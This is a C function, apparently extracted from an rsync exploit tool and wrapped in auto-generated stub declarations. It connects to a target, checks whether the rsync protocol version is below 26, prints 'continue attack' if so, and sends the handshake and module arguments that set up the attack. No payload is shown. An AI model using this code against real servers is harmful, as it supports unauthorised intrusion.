
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


typedef int out ;
struct TYPE_2__ {char* module; scalar_t__ checkvuln; } ;


 char* VERSION ;
 int fprintf (int ,char*,...) ;
 int memset (char*,char,int) ;
 int quit (int) ;
 int read (int,char*,int) ;
 TYPE_1__ rsx ;
 int snprintf (char*,int,char*,char*) ;
 int stderr ;
 char* strchr (char*,int) ;
 int strlen (char*) ;
 long strtoul (char*,char**,int ) ;
 scalar_t__ write (int,char*,int) ;

int
setup(int s)
{


        char out[512], *check;
        long version = 0;


        if(rsx.checkvuln) {
                rsx.checkvuln = 0;


                memset(out, '\0', sizeof(out));
                read(s, out, sizeof(out)-1);
                if((check = strchr(out, (int)':')) != ((void*)0)) {
                        version = strtoul((char *)check+1, (char **)check+3, 0);
                        if(version >= 26) {
                          fprintf(stderr, "target is not vulnerable (version: %lu)\n", version);
                          return -1;
                        }
                }
                else {
                        fprintf(stderr, "did not get version reply..aborting\n");
                        quit(s);
                        return -1;
                }

                fprintf(stderr, "Target appears to be vulnerable..continue attack\n");
        }


        if(write(s, VERSION, strlen(VERSION)) < 0) return -1;


        memset(out, '\0', sizeof(out));
        snprintf(out, sizeof(out)-1, "%s\n", rsx.module);
        if(write(s, out, strlen(out)) < 0) return -1;
        if(write(s, "--server\n", 9) < 0) return -1;
        if(write(s, "--sender\n", 9) < 0) return -1;
        if(write(s, ".\n", 2) < 0) return -1;

        if(write(s, out, strlen(out)) < 0) return -1;

        if(write(s, "\n", 1) < 0) return -1;

        return 1;
}
